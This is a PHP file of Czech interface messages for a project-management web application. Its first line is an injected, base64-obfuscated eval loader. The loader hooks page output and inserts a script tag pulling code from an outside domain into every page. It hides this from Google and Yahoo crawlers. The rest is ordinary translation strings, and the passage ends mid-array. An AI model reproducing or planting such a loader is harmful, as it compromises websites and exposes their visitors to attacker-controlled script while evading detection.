<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
<?php

  /**
  * Array of messages file (error, success message, status...)
  *
  * @version 1.0
  * @author Ilija Studen <ilija.studen@gmail.com>
  * @czech translation Ludek Smolik <lu@wo.cz>
  */ 

  return array(
  
    // Empty, dnx et
    'no mail accounts set' => 'Nejsou vytvořeny žádné mailové účty přes které by bylo možné odeslat e-mail. Prosím, vytvořte nejprve e-mailový účet.',
    'no mail accounts set for check' => 'Nemáte žádný e-mailový účet. Prosím, nejprve vytvořte e-mailový účet.',
    'email dnx' => 'Požadovaný e-mail neexistuje',
  	'email dnx deleted' => 'Požadovaný e-mail byl vymazán z databáze',
    'project dnx' => 'Požadovaná pracovní plocha není v databázi',
    'contact dnx' => 'Požadovaný kontakt není v databázi',
    'company dnx' => 'POžadovaná společnost není v databázi',
    'message dnx' => 'Požadovaná poznámka neexistuje',
    'no comments in message' => 'K této poznámce neexistují žádné komentáře',
    'no comments associated with object' => 'K tomuto objektu nebyly odeslány žádné komentáře',
    'no messages in project' => 'Tento projekt neobsahuje žádné poznámky',
    'no subscribers' => 'K tomuto objektu nejsou přihlášeni žádní uživatelé',
    'no activities in project' => 'Pro tento projekt nejsou žádné záznamy aktivit',
    'comment dnx' => 'Požadovaný komentář neexistuje',
    'milestone dnx' => 'Požadovaný milník neexistuje',
    'task list dnx' => 'Požadovaný úkol neexistuje',
    'task dnx' => 'Požadovaný úkol neexistuje',
    'event type dnx' => 'Požadovaný typ události neexistuje',
    'no milestones in project' => 'Tento projekt neobsahuje žádné milníky',
    'no active milestones in project' => 'V tomto projektu nejsou žádné aktivní milníky',
    'empty milestone' => 'Tento milník je prázdný. Můžete k němu kdykoliv přidat <a class="internalLink" href="{1}">úkol</a>',
    'no logs for project' => 'Pro tento projekt neexistují žádné záznamy ',
    'no recent activities' => 'Žádné nedávné aktivity nejsou v databázi zaznamenané',
    'no open task lists in project' => 'V tomto projektu nejsou žádné otevřené úkoly',
    'no completed task lists in project' => 'V tomto projektu nejsou žádné dokončené úkoly',
    'no open task in task list' => 'V tomto seznamu nejsou žádné otevřené úkoly',
    'no closed task in task list' => 'V tomto seznamu nejsou žádné otevřené úkoly',
    'no open task in milestone' => 'V tomto milníku nejsou žádné otevřené úkoly',
    'no closed task in milestone' => 'V tomto milníku nejsou žádné uzavřené úkoly',
    'no projects in db' => 'V databázi nejsou definované žádné pracovní plochy pro projekty',
    'no projects owned by company' => 'Tato společnost nemá žádné projekty',
    'no projects started' => 'Žádné započaté projekty',
    'no active projects in db' => 'Žádné aktivní projekty',
    'no new objects in project since last visit' => 'Od Vaší poslední návštěvy v tomto projektu nepřibyly žádné nové objekty',
    'no clients in company' => 'Vaše společnost nemá žádné registrované klienty',
    'no users in company' => 'Tato společnost nemá žádné uživatele',
    'client dnx' => 'Vybraný klient společnosti neexistuje',
    'company dnx' => 'Vybraná společnost neexistuje',
    'user dnx' => 'Požadovaný uživatel není v databázi',
    'avatar dnx' => 'Avatar neexistuje',
    'no current avatar' => 'Avatar není nahrán',
    'picture dnx' => 'Obrázek neexistuje',
    'no current picture' => 'Obrázek není nahrán',
    'no current logo' => 'Logo není nahráno',
    'user not on project' => 'Vybraný uživatel není připojen k vybraném projektu',
    'company not on project' => 'Vybraná společnost není připojena k vybranému projektu',
    'user cant be removed from project' => 'Vybraný uživatel nemůže být odstraněn z projektu',
    'tag dnx' => 'Požadovaný štíek neexistuje',
    'no tags used on projects' => 'Tyto projekty nemají žádné štítky',
    'no forms in project' => 'Projekt neobsahuje žádné formuláře',
    'project form dnx' => 'Požadovaný formulář projektu není v databázi',
    'related project form object dnx' => 'Související formulářový objekt není v databázi',
    'no my tasks' => 'Nemáte přiřazené žádné úkoly',
    'no search result for' => 'Žádné objekty neodpovídají "<strong>{0}</strong>"',
    'no files on the page' => 'Na této stránce nejsou žádné soubory',
    'folder dnx' => 'Požadovaný adresář není v databázi',
    'define project folders' => 'Na této pracovní ploše nejsou žádné adresáře. Pro pokračování definujte adresáře',
    'file dnx' => 'Požadovaný soubor není v databázi',
    'not s5 presentation' => 'Nemohu spustit slideshow protože požadovaný soubor není platná S5 prezentace',
    'file not selected' => 'Žádný soubor nebyl vybrán',
    'file revision dnx' => 'Požadovaná revize není v databázi',
    'no file revisions in file' => 'Neplatný soubor - s tímto souborem nejsou asociovány žádné revize',
    'cant delete only revision' => 'Nemůžete smazat tuto revizi. Každý soubor musí mít odeslánu alespoň jednu revizi least one revision posted',
    'config category dnx' => 'Vámi požadovaná konfigurační kategorie neexistuje',
    'config category is empty' => 'Vybraná konfigurační kategorie je prázdná',
    'email address not in use' => '{0} se nepoužívá',
    'no linked objects' => 'K tomuto objektu nejsou připojeny žádné objekty',
    'object not linked to object' => 'Mezi vybranými objekty není žádné spojení',
    'no objects to link' => 'Prosím, vyberte objekty pro spojení',
    'no administration tools' => 'V databázi nejsou zaregistrovány žádné nástroje pro správu',
    'administration tool dnx' => 'Nástroj pro správu "{0}" neexistuje',
    
    // Success
    'success add contact' => 'Kontakt \'{0}\' byl úspěšně vytvořen',
    'success edit contact' => 'Kontakt \'{0}\' byl úspěšně aktualizován',
    'success delete contact' => 'Kontakt \'{0}\' byl úspěšně smazán',
    'success edit picture' => 'Obrázek byl úspěšně aktualizován',
    'success delete picture' => 'Obrázek byl úspěšně smazán',
    
    'success add project' => 'Pracovní plocha projektu {0} byla úspěšně přidána',
    'success edit project' => 'Pracovní plocha projektu {0} byla úspěšně aktualizována',
    'success delete project' => 'Pracovní plocha projektu {0} byla úspěšně smazána',
    'success complete project' => 'Projekt {0} byl úspěšně dokončen',
    'success open project' => 'Projekt {0} byl znovu otevřen',
    
    'success add milestone' => 'Milník \'{0}\' byl úspěšně vytvořen',
    'success edit milestone' => 'Milník \'{0}\' byl úspěšně aktualizován',
    'success deleted milestone' => 'Milník \'{0}\' byl úspěšně smazán',
    
    'success add message' => 'Poznámka {0} byla úspěšně přidána',
    'success edit message' => 'Poznámka {0} byla úspěšně aktualizována',
    'success deleted message' => 'Poznámka \'{0}\' a všechny související komentáře byly úspěšně smazány',
    
    'success add comment' => 'Komentář byl úšpěšně odeslán',
    'success edit comment' => 'Komentář byl úšpěšně aktualizován',
    'success delete comment' => 'Komentář byl úšpěšně vymazán',
    
    'success add task list' => 'Úkol \'{0}\' byl úšpěšně přidán',
    'success edit task list' => 'Úkol \'{0}\' byl úšpěšně aktualizován',
    'success delete task list' => 'Úkol \'{0}\' byl úšpěšně smazán',
    
    'success add task' => 'Vybraný úkol byl přidán',
    'success edit task' => 'Vybraný úkol byl aktualizován',
    'success delete task' => 'Vybraný úkol byl smazán',
    'success complete task' => 'Vybraný úkol byl dokončen',
    'success open task' => 'Vybraný úkol byl znovu otevřen',
    'success n tasks updated' => '{0} úkolů aktualizováno',
	'success add mail' => 'E-mail byl úspěšně odeslán',
    
    'success add client' => 'Klient  {0} byl přidán',
    'success edit client' => 'Klient společnosti {0} byl aktualizován',
    'success delete client' => 'Klient společnosti {0} byl smazán',
    
    'success add group' => 'Skupina {0} byla přidána',
    'success edit group' => 'Skupina {0} byla aktualizována',
    'success delete group' => 'Skupina {0} byla vymazána',
    
    'success edit company' => 'Data  společnosti byla aktualizována',
    'success edit company logo' => 'Logo společnosti bylo aktualizováno',
    'success delete company logo' => 'Logo společnosti bylo smazáno',
    
    'success add user' => 'Uživatel {0} byl úspěšně přidán',
    'success edit user' => 'Uživatel {0} byl úspěšně aktualizován',
    'success delete user' => 'Uživatel {0} byl úspěšně smazán',
    
    'success update project permissions' => 'Oprávnění pracovní plochy projektu bly úspěšně aktualizována',
    'success remove user from project' => 'Uživatel byl úspěšně vyjmut z projektu',
    'success remove company from project' => 'Společnost byla úspěšně vyjmuta z projektu',
    
    'success update profile' => 'Profil byl aktualizován',
    'success edit avatar' => 'Avatar byl úspěšně aktualizován',
    'success delete avatar' => 'Avatar byl úspěšně vymazán',
    
    'success hide welcome info' => 'Uvítací informace byly úspěšně skryty',
    
    'success complete milestone' => 'Milník \'{0}\' byl ukončen',
    'success open milestone' => 'Milník \'{0}\' byl znovu otevřen',
    
    'success subscribe to object' => 'K tomuto objektu jste byliúspěšně připojeni',
    'success unsubscribe to object' => 'Od tohoto objektu jste byli úspěšně odhlášeni',
    
    'success add project form' => 'Formulář \'{0}\' byl přidán',
    'success edit project form' => 'Formulář \'{0}\' byl aktualizován',
    'success delete project form' => 'Formulář \'{0}\' byl smazán',
    
    'success add folder' => 'Adresář \'{0}\' byl přidán',
    'success edit folder' => 'Adresář \'{0}\' byl aktualizován',
    'success delete folder' => 'Adresář \'{0}\' byl smazán',
    
    'success add file' => 'Soubor \'{0}\' byl přidán',
	'success save file' => 'Soubor \'{0}\' byl uložen',
    'success edit file' => 'Soubor \'{0}\' byl aktualizován',
    'success delete file' => 'Soubor \'{0}\' byl smazán',
    'success delete files' => '{0} soubor(ů) byl(o) smazán(o)',
    'success tag files' => '{0} soubor(ů) byl(o) označen(o)',
    'success tag contacts' => '{0} konakt(ů) byl(o) označen(o)',
    
    'success add handis' => 'Úspěšná aktualizace',
    
    'success add properties' => 'Vlastnosti byly aktualizovány',
    
    'success edit file revision' => 'Revize byla aktualizována',
    'success delete file revision' => 'Revize souboru byla smazána',
    
    'success link objects' => '{0} objekt(ů) bylo úspěšně spojeno',
    'success unlink object' => 'Objekt byl úspěšně odpojen',
    
    'success update config category' => '{0} konfiguračních hodnot bylo aktualizováno',
    'success forgot password' => 'Vaše heslo Vám bylo zasláno e-mailem',
    
    'success test mail settings' => 'Zkušební zpráva byla úspěšně odeslána',
    'success massmail' => 'E-mail byl odeslán',
    
    'success update company permissions' => 'Oprávnění společnosti byla úspěšně aktualizována. {0} Záznamů aktualizován(o)',
    'success user permissions updated' => 'Uživatelská oprávnění byla aktualizována',
  
    'success add event' => 'Událost byla přidána',
    'success edit event' => 'Událost byla aktualizována',
    'success delete event' => 'Událost byla smazána',
    
    'success add event type' => 'Typ události byl přidán',
    'success delete event type' => 'Typ události byl smazán',
    
    'success add webpage' => 'Webový odkaz byl přidán',
    'success edit webpage' => 'Webový odkaz byl aktualizován',
    'success deleted webpage' => 'Webový odkaz byl smazán',
    
    'success add chart' => 'Graf byl přidán',
    'success edit chart' => 'Graf byl aktualizován',
    'success delete chart' => 'Graf byl smazán',
    'success delete charts' => 'Vybrané grafy byly úspěšně smazány',
  
    'success delete contacts' => 'Vybrané kontakty byly úspěšně smazány',
  
    'success classify email' => 'E-mail úspěšně klasifikován',
    'success delete email' => 'E-mail byl smazán',
  
    'success delete mail account' => 'E-mailový účet byl smazán úspěšně',
    'success add mail account' => 'E-mailový účet byl vytvořen úspěšně',
    'success edit mail account' => 'E-mailový účet byl aktualizován úspěšně',
  
    'success link object' => 'Objekt byl spojen úspěšně',
  
  	'success check mail' => 'Načítání e-mailů dokončeno: {0} e-mail(ů) přijat(o).',
  
	'success delete objects' => '{0} Objektu/ů smazán(o) úspěšně',
	'success tag objects' => '{0} Objektu/ů označeno úspěšně',
	'error delete objects' => 'Smazání {0} objektu/ů selhalo',
	'error tag objects' => 'Označení {0} objektu/ů selhalo',
	'success move objects' => '{0} objektu/ů úspěšně přesunuto',
	'error move objects' => 'Přesun {0} objektu/ů selhal',
  
    'success checkout file' => 'Soubor byl úspěšně uzamčen!',
    'success checkin file' => 'souobor byl úspěšně zkontrolován',
  	'success undo checkout file' => 'Soubor byl úspěšně odemčen!',
    
    // Failures
    'error edit timeslot' => 'Uložení časového úseku se nezdařilo',
  	'error delete timeslot' => 'Smazání vybraného časového úseku se nezdařilo',
  	'error add timeslot' => 'Přidání časového úseku se nezdařilo',
  	'error open timeslot' => 'Otevření časového úseku se nezdařilo',
  	'error close timeslot' => 'Uzavření časového úselku se nezdařilo',
    'error start time after end time' => 'Nemohu uložit časový úsek: Počáteční čas musí být před časem ukončení',
    'error form validation' => 'Nemohu uložit objekt, protože některá z jeho vlastností je neplatná',
    'error delete owner company' => 'Vlastník společnostvi nemůže být smazán',
    'error delete message' => 'Smazání vybrané poznámky se nezdařilo',
    'error update message options' => 'Aktualizace volby poznámky se nezdařila',
    'error delete comment' => 'Smazání vybraného komentáře se nezdařilo',
    'error delete milestone' => 'Smazání vybraného milníku se nezdařilo',
    'error complete task' => 'Nelze dokončit vybraný úkol',
    'error open task' => 'Znovuotevření vybraného úkolu se nezdařilo',
    'error upload file' => 'Nelze nahrát soubor',
    'error delete project' => 'Nelze smazat vybraný projekt',
    'error complete project' => 'Nelze dokončit vybraný projekt',
    'error open project' => 'Vybraný projekt nelze znovu otevžít',
    'error delete client' => 'Nelze smazat klienta vybrané společnosti',
    'error delete group' => 'Vybranou skupinu nelze smazat',
    'error delete user' => 'Vybraného uživatele nelze smazat',
    'error update project permissions' => 'Nelze aktualizovat oprávnění projektu',
    'error remove user from project' => 'Uživatele nelze vyjmout z projektu',
    'error remove company from project' => 'Společnost nelze vyjmout z projektu',
    'error edit avatar' => 'Nelze upravit avatar',
    'error delete avatar' => 'Nelze smazat avatar',
    'error edit picture' => 'Nelze upravit obrázek',
    'error delete picture' => 'Nelze smazat obrázek',
    'error edit contact' => 'Kontakt nelze upravit',
    'error delete contact' => 'Kontakt nelze smazat',
    'error hide welcome info' => 'uvítací informace nelze skrýt',
    'error complete milestone' => 'Vybraný milník nelze dokončit',
    'error open milestone' => 'Vybraný milník nelze znovu otevřít',
    'error file download' => 'Určený soubor nelze stáhnout',
    'error link object' => 'Připojení k objektu se nezdařilo',
    'error edit company logo' => 'Aktualizace loga společnosti se nezdařila',
    'error delete company logo' => 'Nelze smazat logo společnosti',
    'error subscribe to object' => 'Přihlášení kvybranému objektu se nezdařilo',
    'error unsubscribe to object' => 'Odhlášení od vybraného objektu se nezdařilo',
    'error add project form' => 'Nepodařilo se přidat fromulář projektu',
    'error submit project form' => 'Odevzdání formuláře projektu se nezdařilo',
    'error delete folder' => 'Nelze smazat vybraný adresář',
    'error delete file' => 'Nelze smazat vybraný soubor',
    'error delete files' => 'Nelze smazat {0} souborů',
    'error tag files' => 'Nelze označit {0} souborů',
    'error tag contacts' => 'nelze označit {0} kontaktů',
    'error delete file revision' => 'Nelze smazat revizi souboru',
    'error delete task list' => 'Nelze smazat vybraný úkol',
    'error delete task' => 'Nelze smazat vybraný úkol',
    'error check for upgrade' => 'Kontrola dostupnosti nové verze selhala',
    'error link object' => 'Nelze připojit objekt(y)',
    'error unlink object' => 'Nelze odpojit objekt(y)',
    'error link objects max controls' => 'Nelze přidat více propojení. Limit je {0}',
    'error test mail settings' => 'Odeslání zkušební zprávy selhalo',
    'error massmail' => 'Odeslání e-mailu se nezdařilo',
    'error owner company has all permissions' => 'Vlastník spolčenosti má všechna oprávnění',
    'error while saving' => 'Při ukládání dokumentu se vyskytla chyba',
    'error delete event type' =>'Tento typ události nelze smazat',
    'error delete mail' => 'Při mazání této zprávy se vyskytla chyba',
    'error delete mail account' => 'Při mazání tohoto e-mailového účtu se vyskytla chyba',
    'error delete contacts' => 'Při mazání těchto kontaktů se vyskytla chyba',
  	'error check mail' => 'Chyba při kontrolování účtu \'{0}\': {1}',
  	'error check out file' => 'Při uzamykání souboru pro exkluzivní použití se vyskytla chyba',
    'error checkin file' => 'Chyba při uzamykání souboru',
    'error classifying attachment cant open file' => 'Při klasifikaci přílohy se vyskytla chyba: nelze otevřít soubor',
  	'error contact added but not assigned' => 'Kontakt \'{0}\' byl přidán, ale nepodařilo se ho úspěšně připojit k projektu \'{1}\' kvůli nedostatečnému oprávnění.',
  	'error cannot set workspace as parent' => 'Nemohu nastavit pracovní plochu projektu \'{0}\' jako rodičovskou, je zde příliš mnoho úrovní pracovních ploch nebo opakujících se odkazů',
  
    
    // Access or data errors
    'no access permissions' => 'Nemáte práva pro přístup k požadované stránce',
    'invalid request' => 'Neplatný požadavek!',
    
    // Confirmation
    'confirm cancel work timeslot' => "Opravdu chcete zrušit aktuální časový úsek?",
    'confirm delete mail account' => 'Varování: Všechny e-mailové zprávy patřící tomuto účtu budou smazány. Opravdu chcete smazat tento e-mailový účet?',
    'confirm delete message' => 'Opravdu chcete smazat tuto poznámku?',
    'confirm delete milestone' => 'Opravdu chcete smazat tento milník?',
    'confirm delete task list' => 'Opravdu chcete smazat tento úkol a všechny související podúkoly?',
    'confirm delete task' => 'Opravdu chcete smazat tento úkol?',
    'confirm delete comment' => 'Opravdu chcete smazat tento komentář?',
    'confirm delete project' => 'Opravdu chcete smazat tento projekt a všechna související data (poznámky, úkoly, milníky, soubory...)?',
    'confirm complete project' => 'Opravdu chcete označit tuto pracovní plochu za uzavřenou? Všechny akce tohoto projektu budou uzamčeny',
    'confirm open project' => 'Opravdu chcete označit tuto pracovní plochu jako otevřenou? Budou odemčeny všechny akce tohoto projektu.',
    'confirm delete client' => 'Opravdu chcete smazat vybraného klienta společnosti a všechny související uživatele? \nTato akce vymaže také všechny osobní projekty uživatelů.',
    'confirm delete contact' => 'Opravdu chcete smazat vybraný kontakt?',
    'confirm delete user' => 'Opravdu chcete smazat tento uživatelský účet?\nTato akce také odstraní všechny osobní pracovní plochy uživatelů.',
    'confirm reset people form' => 'Opravdu chcete smazat tento formulář? Všechny úpravy budou ztraceny!',
    'confirm remove user from project' => 'Opravdu chcete vyjmout uživatele z tohoto projektu?',
    'confirm remove company from project' => 'Opravdu chcete vyjmout tuto společnost z projektu?',
    'confirm logout' => 'Opravdu se chcete odhlásit?',
    'confirm delete current avatar' => 'Opravdu chcete smazat tento avatar?',
    'confirm unlink object' => 'Opravdu chcete odpojit tento objekt?',
    'confirm delete company logo' => 'Opravdu chcete smazat toto logo?',
    'confirm subscribe' => 'Opravdu se chcete přihlásit k tomuto objektu? Budete dostávat e-mailové zprávy kdykoliv někdo (kromě Vás) odešle komentář související s tímto objektem',
    'confirm unsubscribe' => 'Opravdu se chcete odhlásit?',
    'confirm delete project form' => 'Opravdu chcete smazat tento formulář?',
    'confirm delete folder' => 'Opravdu chcete smazat tento adresář?',
    'confirm delete file' => 'Opravdu chcete smazat tento soubor?',
    'confirm delete revision' => 'Opravdu chcete smazat tuto revizi?',
    'confirm reset form' => 'Opravdu chcete vynulovat tento formulář?',
    'confirm delete contacts' => 'Opravdu chcete smazat tyto kontakty?',
	'confirm delete group' => 'Opravdu chcete smazat tuto skupinu?',
    
    // Errors...
    'system error message' => 'Omlouváme se, ale závažná chyba zabránila aplikaci uskutečnit Váš požadavek. Zpráva o chybě byla odeslána správci.',
    'execute action error message' => 'Omlouváme se, ale aplikace v současné době není schopna vykonat Váš požadavek. Zpráva o chybě byla odeslána správci..',
    
    // Log
    'log add projectmessages' => '\'{0}\' přidán(o)',
    'log edit projectmessages' => '\'{0}\' aktualizován(o)',
    'log delete projectmessages' => '\'{0}\' smazán(o)',
  	'log trash projectmessages' => '\'{0}\' přesunut(o) do koše',
  	'log untrash projectmessages' => '\'{0}\' obnoven(o) z koše',
  
  	'log add projectevents' => '\'{0}\' přidán(o)',
    'log edit projectevents' => '\'{0}\' updated',
    'log delete projectevents' => '\'{0}\' smazán(o)',
  	'log trash projectevents' => '\'{0}\' přesunut(o) do koše',
  	'log untrash projectevents' => '\'{0}\' obnoven(o) z koše',
    
    'log add comments' => '{0} přidán(o)',
    'log edit comments' => '{0} aktualizován(o)',
    'log delete comments' => '{0} smazán(o)',
  	'log trash comments' => '\'{0}\' přesunut(o) do koše',
  	'log untrash comments' => '\'{0}\' obnoven(o) z koše',
    
    'log add projectmilestones' => '\'{0}\' přidán(o)',
    'log edit projectmilestones' => '\'{0}\' aktualizován(o)',
    'log delete projectmilestones' => '\'{0}\' smazán(o)',
    'log close projectmilestones' => '\'{0}\' ukončen(o)',
    'log open projectmilestones' => '\'{0}\' znovu otevřen(o)',
  	'log trash projectmilestones' => '\'{0}\' přesunut(o) do koše',
  	'log untrash projectmilestones' => '\'{0}\' obnoven(o) z koše',
    
    'log add projecttasklists' => '\'{0}\' přidán(o)',
    'log edit projecttasklists' => '\'{0}\' aktualizován(o)',
    'log delete projecttasklists' => '\'{0}\' smazán(o)',
    'log close projecttasklists' => '\'{0}\' ukončen(o)',
    'log open projecttasklists' => '\'{0}\' otevřen(o)',
  	'log trash projecttasklists' => '\'{0}\' přesunut(o) do koše',
  	'log untrash projecttasklists' => '\'{0}\' obnoven(o) z koše',
    
    'log add projecttasks' => '\'{0}\' přidán(o)',
    'log edit projecttasks' => '\'{0}\' aktualizován(o)',
    'log delete projecttasks' => '\'{0}\' smazán(o)',
    'log close projecttasks' => '\'{0}\' ukončen(o)',
    'log open projecttasks' => '\'{0}\' otevřen(o)',
  	'log trash projecttasks' => '\'{0}\' přesunut(o) do koše',
  	'log untrash projecttasks' => '\'{0}\' obnoven(o) z koše',
    
    'log add projectforms' => '\'{0}\' přidán(o)',
    'log edit projectforms' => '\'{0}\' aktualizován(o)',
    'log delete projectforms' => '\'{0}\' smazán(o)',
  	'log trash projectforms' => '\'{0}\' přesunut(o) do koše',
  	'log untrash projectforms' => '\'{0}\' obnoven(o) z koše',
    
    'log add projectfolders' => '\'{0}\' přidán(o)',
    'log edit projectfolders' => '\'{0}\' aktualizován(o)',
    'log delete projectfolders' => '\'{0}\' smazán(o)',
    
    'log add projectfiles' => '\'{0}\' uploaded',
    'log edit projectfiles' => '\'{0}\' aktualizován(o)',
    'log delete projectfiles' => '\'{0}\' smazán(o)',
  	'log trash projectfiles' => '\'{0}\' přesunut(o) do koše',
  	'log untrash projectfiles' => '\'{0}\' obnoven(o) z koše',
    
    'log edit projectfilerevisions' => '{0} aktualizován(o)',
    'log delete projectfilerevisions' => '{0} smazán(o)',
  	'log trash projectfilerevisions' => '\'{0}\' přesunut(o) do koše',
  	'log untrash projectfilerevisions' => '\'{0}\' obnoven(o) z koše',
    
    'log add projectwebpages' => '\'{0}\' přidán(o)',
    'log edit projectwebpages' => '\'{0}\' aktualizován(o)',
    'log delete projectwebpages' => '\'{0}\' smazán(o)',
  	'log trash projectwebpages' => '\'{0}\' přesunut(o) do koše',
  	'log untrash projectwebpages' => '\'{0}\' obnoven(o) z koše',
    
  	'log trash contacts' => '\'{0}\' přesunut(o) do koše',
  	'log untrash contacts' => '\'{0}\' obnoven(o) z koše',
  
  	'no contacts in company' => 'Společnost nemá žádné kontakty.',
  
  	'session expired error' => 'Sezení vypršelo. Prosím, obnovte stránku a přihlašte se znovu.',
  	'admin cannot be removed from admin group' => 'První uživatel nemůže být odstraněn ze skupiny správce',
  	'open this link in a new window' => 'Otevřít tento odkaz v novém okně',
  
  	'confirm delete template' => 'Opravdu chcete smazat tuto šablonu?',
  	'success delete template' => 'Šablona \'{0}\' byla smazána',
  	'success add template' => 'Šablona byla přidána',
  
  	'log add companies' => '\'{0}\' přidán(o)',
  	'log edit companies' => '\'{0}\' aktualizován(o)',
  	'log delete companies' => '\'{0}\' smazán(o)',
  	'log trash companies' => '\'{0}\' přesunut(o) do koše',
  	'log untrash companies' => '\'{0}\' obnoven(o) z koše',
  
  	'log add mailcontents' => '\'{0}\' přidán(o)',
  	'log edit mailcontents' => '\'{0}\' aktualizován(o)',
  	'log delete mailcontents' => '\'{0}\' smazán(o)',
  	'log trash mailcontents' => '\'{0}\' přesunut(o) do koše',
  	'log untrash mailcontents' => '\'{0}\' obnoven(o) z koše',
  
  	'log open timeslots' => '\'{0}\' otevřen(o)',
    'log close timeslots' => '\'{0}\' ukončen(o)',
    'log delete timeslots' => '\'{0}\' smazán(o)',
  	'log trash timeslots' => '\'{0}\' přesunut(o) do koše',
  	'log untrash timeslots' => '\'{0}\' obnoven(o) z koše',
  	'error assign workspace' => 'Připojení šablony k pracovní ploše se nezdařilo',
  	'success assign workspaces' => 'Šblona byla úspěšně připojena k pracovní ploše',
  	'success update config value' => 'Konfigurační hodnoty byly aktualizovány',
  	'view open tasks' => 'Otevřít úkoly',
  	'already logged in' => 'Již jste přihlášeni',
  
	'some tasks could not be updated due to permission restrictions' => 'Některé úkoly nemohou být aktualizovány kvůli omezením vyplývajícím z přidělených oprávnění',
  
